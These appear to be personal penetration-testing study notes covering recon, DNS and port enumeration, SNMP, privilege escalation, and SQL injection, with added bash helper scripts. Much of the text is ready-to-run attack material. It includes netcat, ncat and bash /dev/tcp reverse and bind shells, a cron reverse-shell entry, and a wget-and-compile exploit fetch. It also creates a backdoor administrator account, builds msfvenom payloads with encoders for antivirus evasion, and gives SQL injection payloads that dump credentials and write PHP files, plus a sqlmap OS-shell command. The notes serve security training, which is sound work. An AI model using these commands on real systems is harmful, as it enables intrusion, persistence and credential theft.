Locate
- Find files by name (searches the locate database, not the live filesystem)
locate kim.txt
- Refresh the database first if the file is new
sudo updatedb
- e.g.
locate nc.exe
Which
- See manual for which
man which
- e.g.
which sbd
find
- Manual
man find
- Find recursively from the current directory
find . -name php.ini
- e.g. (quote the pattern so the shell does not expand the * before find sees it)
find ~/ -name 'kim*'
- Run a command on each result
find ~/ -name 'kim*' -exec file {} \;
- e.g.
sudo find /usr -name 'sbd*' -exec file {} \;
Service
- Start a service (these three are equivalent)
sudo systemctl start apache2
sudo service apache2 start
/etc/init.d/apache2 start
Boot persistence
- Start at boot (these are equivalent)
sudo systemctl enable ssh.service
sudo update-rc.d ssh enable
rcconf
grep with regular expressions
- -o prints only the matching part of each line (escape the literal dots; inside [] a dot is already literal)
grep -o '[A-Za-z0-9_.-]*\.whatsapp\.com' index.html
grep -o 'https://[A-Za-z0-9_.-]*\.whatsapp\.com' index.html
- -e takes the pattern; without -o the whole matching line is printed
grep -e '[A-Za-z0-9_.-]*\.whatsapp\.com' index.html
grep -e 'https://[A-Za-z0-9_.-]*\.whatsapp\.com' index.html
Learn to write a bash script
- Create the script and make it executable
nano cisco.sh
chmod 755 cisco.sh or chmod +x cisco.sh
- Resolve every hostname in cisco.txt to its IPv4 address
#!/bin/bash
for url in $(cat cisco.txt); do
host "$url" | grep "has address" | cut -d " " -f4
done
- Scenario: grep all hostnames ending in app.com out of a page and return their IPs
#!/bin/bash
for url in $(grep -o '[A-Za-z0-9_.-]*app\.com' index.html | sort -u); do
host "$url" | grep "has address" | cut -d " " -f4
done
- Scenario: ping each host once and print those that reply. The trailing & runs the pings in parallel, so wait is needed or the script exits before the replies arrive; -W 1 caps each wait at one second; tr strips the trailing colon from "64 bytes from 10.x.x.x:"
#!/bin/bash
for ip in $(seq 1 254); do
ping -c 1 -W 1 10.123.38.$ip | grep "bytes from" | cut -d " " -f4 | tr -d ':' &
done
wait
Netcat (old)
- Reads from and writes to raw TCP and UDP connections
- e.g. connect to ssh (banner grab)
nc -nv 10.123.3.11 22
- e.g. connect to ftp
nc -nv 10.123.9.11 21
- e.g. chatting
Listening: nc -nlvp 4444
Connect back: nc -nv 10.123.3.11 4444
- e.g. file transfer
Listener: nc -nvlp 4444 > download.exe
Connect to listener: nc -nv victim 4444 < /file/to/upload.exe
- e.g. bind shell. -e needs netcat-traditional or ncat; the OpenBSD nc shipped by many distros has no -e. Use -e /bin/bash on a Linux target.
Listener binding a shell (serving cmd.exe): nc -nvlp 4444 -e cmd
Connect to listener: nc -nv host 4444
- e.g. reverse shell (when the target is behind a firewall that blocks inbound connections but allows outbound)
From outside (set up listener): nc -nlvp 4444
Host behind the firewall connects out: nc -nv 192.168.32.162 4444 -e cmd
ncat (new, ships with Nmap; adds --ssl and --allow)
- ncat bind shell (--allow restricts which client IP may connect; --ssl encrypts the channel, both ends must use it)
Listener: ncat -lvp 4444 -e cmd --allow 192.168.32.162 --ssl
Connect to listener: ncat -v 192.168.32.53 4444 --ssl
- ncat reverse shell (when behind a firewall)
From outside (set up listener): ncat -lvp 4444 --allow 192.168.32.53 --ssl
Host behind the firewall connects out: ncat -v 192.168.32.162 4444 -e cmd --ssl
Google Search operators
- site:
site:"microsoft.com"
site:"microsoft.com" -site:"www.microsoft.com"
- filetype:
site:"microsoft.com" filetype:ppt "penetration testing"
- intitle:
intitle:"VNC viewer for Java"
intitle:"-N3t" filetype:php undetectable
- inurl:
inurl:"/control/userimage.html" camera
inurl:.php? intext:character_sets,collations intitle:phpmyadmin
- GHDB (Google Hacking DB)
https://www.exploit-db.com/google-hacking-database
DNS enumeration
- ns (nameserver)
host -t ns abc.com
- mx
host -t mx abc.com
- A record (the default query type)
host abc.com
Forward DNS lookup (brute force subdomains from a wordlist)
- Create the script and make it executable
nano forward.sh
chmod +x forward.sh
#!/bin/bash
for name in $(cat list.txt); do
host "$name.abc.com" | grep "has address"
done
Reverse DNS lookup
- Find the IP of a known host to learn the address range
host sub.abc.com
- Loop through that IP segment, e.g. a /27 or /28, keeping only PTR records that point into the target domain (x.x.x is the network prefix found above)
nano reverse.sh
chmod +x reverse.sh
#!/bin/bash
for ip in $(seq 1 254); do
host x.x.x.$ip | grep "abc.com"
done
DNS zone transfer
- Find the nameservers for the domain
host -t ns abc.com
- Attempt a transfer (AXFR) against each nameserver; -l lists the zone
host -l abc.com ns1.abc.com
host -l abc.com ns2.abc.com
- Script it: field 4 of "kim.sg name server ns1.kim.sg." is the server name
#!/bin/bash
for server in $(host -t ns kim.sg | cut -d" " -f4); do
host -l kim.sg "$server"
done
Port scanning with nc
- TCP connect scan, 1 s timeout per port, -z sends no data. Slow across all 65535 ports and noisy, since every port gets a full connection
nc -nv -w 1 -z 10.123.9.11 1-65535
SYN scanning
- Half-open scan (nmap -sS); readily logged or filtered by modern firewalls and IDS
UDP scanning
- Unreliable: no reply can mean open or filtered, and routers and firewalls may drop the probes or the ICMP port-unreachable responses
Nmap scanning
- Ping sweep (host discovery only) across a /24
sudo nmap -sn 192.168.32.0/24
- Save output in greppable format
sudo nmap -sn 192.168.32.0/24 -oG ping-sweep-nmap.txt
- Scan one port (e.g. 3389) across a /24; hosts that block ping are skipped by host discovery, so add -Pn if results look incomplete
sudo nmap -p 3389 192.168.32.0/24
- Scan the top 20 ports (TCP connect scan)
sudo nmap -sT --top-ports 20 192.168.32.0/24
- Scan for SMB, listing only hosts with the ports open
sudo nmap -p 139,445 192.168.32.11-12 --open
- Scan with NSE scripts. The scripts live in /usr/share/nmap/scripts; --script all runs every one of them, including the intrusive and dos categories, so prefer a category such as default or vuln unless that is in scope
ls /usr/share/nmap/scripts
sudo nmap -v -p 80 --script all 10.123.3.13
nbtscan
- NetBIOS name scan
sudo nbtscan 192.168.32.0/24
- Connect with a null session via rpcclient (-N: no password prompt), then enumerate from its prompt
rpcclient -U "" -N 192.168.32.201
srvinfo
enumdomusers
getdompwinfo
SNMP
- Scan for UDP port 161
sudo nmap -sU -p 161 10.123.31.33
- Test a community string against one host (onesixtyone <host> <community>)
onesixtyone 10.123.3.1 readonly
onesixtyone 10.123.3.1 community_string
- Brute force community strings from a list
onesixtyone -c community_string.txt 10.123.3.1
- Multiple hosts
onesixtyone -c community 10.123.3.0/24
onesixtyone -c community -i ips.txt
- SNMP walk, v1, whole tree
snmpwalk -c readonly -v1 10.123.3.1
- SNMP walk, running programs (hrSWRunName)
snmpwalk -c readonly -v1 10.123.3.1 1.3.6.1.2.1.25.4.2.1.2
- SNMP walk (e.g. Cisco)
snmpwalk -c readonly -v1 10.123.3.1 iso.3.6.1.2.1.3.1.1.1
- SNMP walk of a chosen subtree
snmpwalk -c readonly -v1 10.123.3.1 1.3.6.1.2.x
- snmp-check (e.g.)
snmp-check 10.123.3.1 -c readonly
OpenVAS (Greenbone Vulnerability Management)
- Install gvm
sudo apt-get install gvm
- Setup
sudo gvm-setup
- Start
sudo gvm-start
- If scans fail because the SCAP/CERT data is missing, stop and sync the feeds
sudo gvm-stop
sudo runuser -u _gvm -- greenbone-feed-sync --rsync
sudo greenbone-scapdata-sync
sudo greenbone-certdata-sync
- Update the feeds
sudo runuser -u _gvm -- greenbone-nvt-sync
sudo runuser -u _gvm -- greenbone-feed-sync --type SCAP
sudo runuser -u _gvm -- greenbone-feed-sync --type CERT
sudo runuser -u _gvm -- greenbone-feed-sync --type GVMD_DATA
Restart system and try again.
Buffer overflow (applications)
- pestudio (malware initial assessment): winitor.com
- OllyDbg
https://www.ollydbg.de/
- Immunity Debugger
https://www.immunityinc.com/products/debugger/
Buffer overflow
- Convert shellcode text ("\x41\x42...", possibly wrapped over several lines) to raw bytes. Pass it as the %b argument rather than as the format string, so a % in the payload cannot be misread
printf '%b' "$(tr -d '\n' < fake-payload.txt)"
- Come back later for deeper study
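Added example, not from the original notes: the printf conversion above as reusable functions, taken one step further to check the decoded bytes against a bad-character list, which is the next thing to verify when preparing an overflow payload. The shellcode text and the bad-character list are constructed for illustration.

```bash
#!/bin/bash
# Added example: decode "\x.."-style shellcode text and check it for bad characters.
# Not from the original notes; SAMPLE_SHELLCODE and BADCHARS below are constructed.

# Read escaped shellcode text from stdin (may be wrapped over several lines
# and quoted, as copied out of msfvenom -f c) and write the raw bytes to stdout.
# printf %b expands \xHH escapes; the text is passed as an argument, not as the
# format string, so a literal % in the payload cannot be misread.
shellcode_to_bin() {
  local esc
  esc=$(tr -d '\n\r "')
  printf '%b' "$esc"
}

# Same input, but emit the bytes as space-separated lowercase hex ("41 00 42")
# so they can be compared against a bad-character list in the shell.
shellcode_to_hex() {
  shellcode_to_bin | od -An -tx1 -v | xargs
}

# $1: hex bytes from shellcode_to_hex, $2: bad characters as hex ("00 0a 0d").
# Prints the bad characters that occur in the payload, in the order given.
find_badchars() {
  local hex=" $1 " bad="$2" b found=""
  for b in $bad; do
    case "$hex" in
      *" $b "*) found="$found$b " ;;
    esac
  done
  printf '%s' "${found% }"
}

# Constructed sample: four bytes of code containing a null byte and a line feed,
# the two characters most often fatal in string-based overflows.
SAMPLE_SHELLCODE='\x31\xc0\x00\x0a'
BADCHARS='00 0a 0d'

# Decode to a file (what you would feed to the exploit) and report bad characters first.
demo() {
  local out hex bad
  out=$(mktemp)
  printf '%s' "$SAMPLE_SHELLCODE" | shellcode_to_bin > "$out"
  hex=$(printf '%s' "$SAMPLE_SHELLCODE" | shellcode_to_hex)
  echo "bytes: $hex ($(wc -c < "$out") written to $out)"
  bad=$(find_badchars "$hex" "$BADCHARS")
  if [ -n "$bad" ]; then
    echo "bad characters present: $bad (re-generate with -b or another encoder)"
  else
    echo "no bad characters found"
  fi
  rm -f "$out"
}
demo
```

The hex form is the one to compare against a debugger dump: if the bytes written to memory differ from `shellcode_to_hex`, the character where they first diverge is a bad character the target mangles.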
Searchsploit
- e.g.
searchsploit slmail
FTP server (setup on Kali)
- Install pure-ftpd
sudo apt-get install pure-ftpd
- Create a system group and user for the daemon, then a virtual FTP user (offsec) mapped onto it
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null ftpuser
sudo pure-pw useradd offsec -u ftpuser -d /tmp
- Commit the virtual user database (pure-pw changes are not active until mkdb runs)
sudo pure-pw mkdb
- Enable PureDB authentication
cd /etc/pure-ftpd/auth
sudo ln -s ../conf/PureDB 60pdb
- Hand the home directory to the daemon user (a dedicated directory is safer than chowning the shared /tmp) and restart
sudo chown ftpuser:ftpgroup /tmp
sudo /etc/init.d/pure-ftpd restart
FTP: run non-interactively (scripted, from a Windows cmd prompt)
- Create ftp.txt containing the commands in order
C:\Users\User\test>echo open 10.123.3.14 21 > ftp.txt
C:\Users\User\test>echo loginID>> ftp.txt
C:\Users\User\test>echo loginPW>> ftp.txt
C:\Users\User\test>echo GET test.txt >> ftp.txt
C:\Users\User\test>echo bye >> ftp.txt
- Execute
ftp -s:ftp.txt
PowerShell
- Run PowerShell non-interactively
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File .\test.ps1
Escalation on Linux
- Basic OS info (distribution, kernel version, architecture)
cat /etc/issue
uname -a
- Download the exploit source (write to a file; keep the .c extension, gcc does not recognise .txt as C)
wget -O exploit.c ipv4.kim.sg
- Compile the exploit
gcc exploit.c -o exploit
- Check the compiled file (architecture must match the target)
file exploit
- Check the current user's uid and groups
id
Escalation on Windows
- After escalation create a new user
net user hacker hacker /add
- Add the new user to the local Administrators group (the group name is plural)
net localgroup administrators hacker /add
Windows weak service
- icacls shows (and changes) NTFS ACLs. Check the service binary: (F) full or (M) modify granted to Everyone, BUILTIN\Users or Authenticated Users means a low-privileged user can overwrite it
icacls harmful.exe
- Replace the vulnerable service executable with harmful.exe, then restart the service (or wait for a reboot) so it runs with the service account's privileges
Linux weak service
- Find world-writable files (other-write bit set), run as the low-privileged user; a writable script or binary that root executes is the escalation path
find / -perm -2 ! -type l -ls 2>/dev/null
- The same permission test, written differently
find / -perm -2
find / -perm -o=w
- Symbolic links always carry mode 0777, so exclude them with ! -type l or every symlink on the box is reported
- 2>/dev/null discards the permission-denied errors so they do not flood the console
Linux permission
- Find directories writable by anyone
sudo find /dir -perm -0002 -type d
- Find files writable by anyone
sudo find /dir -perm -0002 -type f
- Symlinks are always 0777, so this lists every symlink under /dir
sudo find /dir -perm -0002 -type l
- Find both files and directories, excluding symbolic links
sudo find /dir -perm -2 ! -type l -ls
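Added example, not from the original notes: the world-writable search from the two sections above as a function that prunes the pseudo-filesystems, drops symlinks and sticky directories, and discards permission errors, plus a companion that uses GNU find's -writable to catch group-writable files the o=w test misses. The fixture it builds in a temporary directory is constructed to show what is and is not reported.

```bash
#!/bin/bash
# Added example (not from the original notes): weak-permission hunting as functions.
# The fixture created by demo() is constructed; run world_writable / as the target user.

# World-writable files and directories under $1 (default /). Skips /proc, /sys
# and /dev, symlinks (always mode 0777, pure noise) and sticky-bit directories
# like /tmp (anyone may create files there, but other users' files cannot be
# renamed or removed, so they rarely give an escalation). Permission errors
# are discarded so the output stays usable from a low-privileged shell.
world_writable() {
  local root="${1:-/}"
  find "$root" \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
       -perm -0002 ! -type l \( -type f -o \( -type d ! -perm -1000 \) \) \
       -print 2>/dev/null | sort
}

# Regular files the *current* user can write under $1, via GNU find -writable.
# This also catches files writable through group membership or ACLs, which
# the other-write bit test above never reports.
writable_by_me() {
  local root="${1:-/}"
  find "$root" \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
       -type f -writable -print 2>/dev/null | sort
}

# Build a small fixture and show the difference between the two searches.
demo() {
  local t
  t=$(mktemp -d)
  mkdir "$t/wdir" "$t/okdir" "$t/stickydir"
  chmod 0777 "$t/wdir"; chmod 0755 "$t/okdir"; chmod 1777 "$t/stickydir"
  touch "$t/wfile" "$t/okfile"
  chmod 0666 "$t/wfile"; chmod 0644 "$t/okfile"
  ln -s "$t/wfile" "$t/link"
  echo "world-writable (expect wdir and wfile only):"
  world_writable "$t"
  echo "writable by $(id -un) (includes own files, e.g. okfile):"
  writable_by_me "$t"
  rm -rf "$t"
}
demo
```

On a real target run `world_writable /` first and read every hit against what runs as root (cron entries, init scripts, service binaries, library paths); `writable_by_me /` is the follow-up for the account you actually hold.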
Reverse shell in cron
- Set up the listener (ports below 1024 need root)
sudo nc -lvp 443
- Reverse shell command for the cron entry: bash opens a TCP connection to the listener via /dev/tcp and ties stdin, stdout and stderr to it
bash -i >& /dev/tcp/10.123.3.12/443 0>&1
Generate payload with msfvenom
- Windows Defender detects the plain payload (-f exe writes a runnable PE; -f c would emit a C byte array for embedding in an exploit instead)
msfvenom -p windows/adduser USER=attackerkim PASS=Password123 -f exe -o adduser.exe --platform Windows -a x86
- Try to evade signature detection with an encoder
msfvenom -p windows/adduser USER=attackerkim PASS=Password123 --encoder x86/xor_dynamic -f exe -o adduser.exe --platform Windows -a x86
- Log poisoning: put PHP code into a request (e.g. in the URL typed into the address bar) so the web server writes it to its log, then execute it by including the log file through a file inclusion flaw
SQL injection
- On a login form
username' or 1=1;#
- Find the number of columns via a GET parameter (e.g. www.abc.com/comments.php?id=123): raise N until the page errors
http://abc.com/comments.php?id=123 order by 6
- Study the response for injected behaviour. A # in a URL must be sent as %23, otherwise the browser treats it as a fragment and the server never sees it
http://abc.com/comments.php?id=123 or 1=2;#
- Check whether a time delay works (blind injection)
http://abc.com/comments.php?id=123-sleep(1);
- Conditional delay: the query the back end ends up running, and the payload that produces it (delays only if the MySQL version starts with 8)
select * from Staff where 1=1 -IF(MID(@@version,1,1)='8', sleep(1), 0);
http://abc.com/comments.php?id=123-IF(MID(@@version,1,1)='8', sleep(1), 0);
- Once the column count is known, use UNION. The union must return exactly as many columns as the original query (four in the examples below); a mismatch errors, which itself confirms the count
http://abc.com/comments.php?id=123 union select 1,2,3;
http://abc.com/comments.php?id=123 union select 1,2,3,@@version;
http://abc.com/comments.php?id=123 union select 1,2,3,user();
http://abc.com/comments.php?id=123 union select 1,2,3,table_name from information_schema.tables;
http://abc.com/comments.php?id=123 union select 1,2,3,column_name from information_schema.columns where table_name='user_summary';
http://abc.com/comments.php?id=123 union select 1,2,3,concat_ws(':',Login,Password) FROM User;
- Read and write files. Needs the FILE privilege; secure_file_priv may restrict the paths, and a written PHP file only helps if it lands where the web server executes it
# Read a file
http://abc.com/index.php?id=123 union select 1,2,3,load_file("/tmp/test.txt");
# Write a file
http://abc.com/index.php?id=123 union select 1,2,3,"write some text" into OUTFILE '/tmp/k.php';
http://abc.com/index.php?id=123 union select 1,2,3,"<?php malicious();?>" into OUTFILE '/tmp/k.php';
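Added example, not from the original notes: the injection URLs above are written the way they are typed into a browser, but sent from a script they must be percent-encoded or the payload is mangled (a space or quote breaks the URL, and an unencoded # is dropped as a fragment before the request leaves the client). These functions build the encoded probes; abc.com, comments.php and id are the placeholders used above, and the request-sending function is the only one that needs network access.

```bash
#!/bin/bash
# Added example (not from the original notes): percent-encode SQLi payloads and
# build the GET probes from the section above. Host/script/parameter names are
# the page's placeholders.

# Percent-encode one string. RFC 3986 unreserved characters pass through,
# everything else becomes %XX. LC_ALL=C makes bash walk the string byte by
# byte, so a non-ASCII payload is encoded per UTF-8 byte, as a browser would.
urlencode() {
  local LC_ALL=C
  local s="$1" out="" c i
  for (( i = 0; i < ${#s}; i++ )); do
    c="${s:i:1}"
    case "$c" in
      [A-Za-z0-9.~_-]) out+="$c" ;;
      *) out+=$(printf '%%%02X' "'$c") ;;
    esac
  done
  printf '%s' "$out"
}

# base?param=<encoded payload>, e.g. build_url http://abc.com/comments.php id "123 order by 6"
build_url() {
  local base="$1" param="$2" payload="$3"
  printf '%s?%s=%s' "$base" "$param" "$(urlencode "$payload")"
}

# One URL per "order by N" for N in 1..max; the first N that errors is one past
# the real column count.
order_by_urls() {
  local base="$1" param="$2" id="$3" max="$4" n
  for (( n = 1; n <= max; n++ )); do
    build_url "$base" "$param" "$id order by $n"
    echo
  done
}

# Send a probe and print HTTP status and total time, which is what a
# sleep()-based check is measured against. curl -G --data-urlencode performs
# the same encoding itself; this is the only function that touches the network.
sqli_probe() {
  local base="$1" param="$2" payload="$3"
  curl -s -o /dev/null -w '%{http_code} %{time_total}\n' -G \
       --data-urlencode "$param=$payload" "$base"
}

# Print the encoded form of the payloads from the notes above.
demo() {
  build_url http://abc.com/login.php username "username' or 1=1;#"; echo
  build_url http://abc.com/comments.php id "123 or 1=2;#"; echo
  build_url http://abc.com/comments.php id "123 union select 1,2,3,@@version"; echo
  order_by_urls http://abc.com/comments.php id 123 6
}
demo
```

Compare the encoded `#` (%23) against the raw form: pasted into a browser, `id=123 or 1=2;#` sends only `id=123 or 1=2;`, so a MySQL comment that looked like it worked in the address bar may be doing nothing at all, and the `-- ` comment form is the safer choice when the fragment cannot be avoided.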
sqlmap
- Crawl one level from the URL and test every parameter found
sqlmap -u http://victim.com --crawl=1
- Get an OS shell (needs file-write or stacked-query capability on the DBMS; --random-agent varies the User-Agent)
sqlmap -u https://victim.com/customer --dbms=mysql --os-shell --random-agent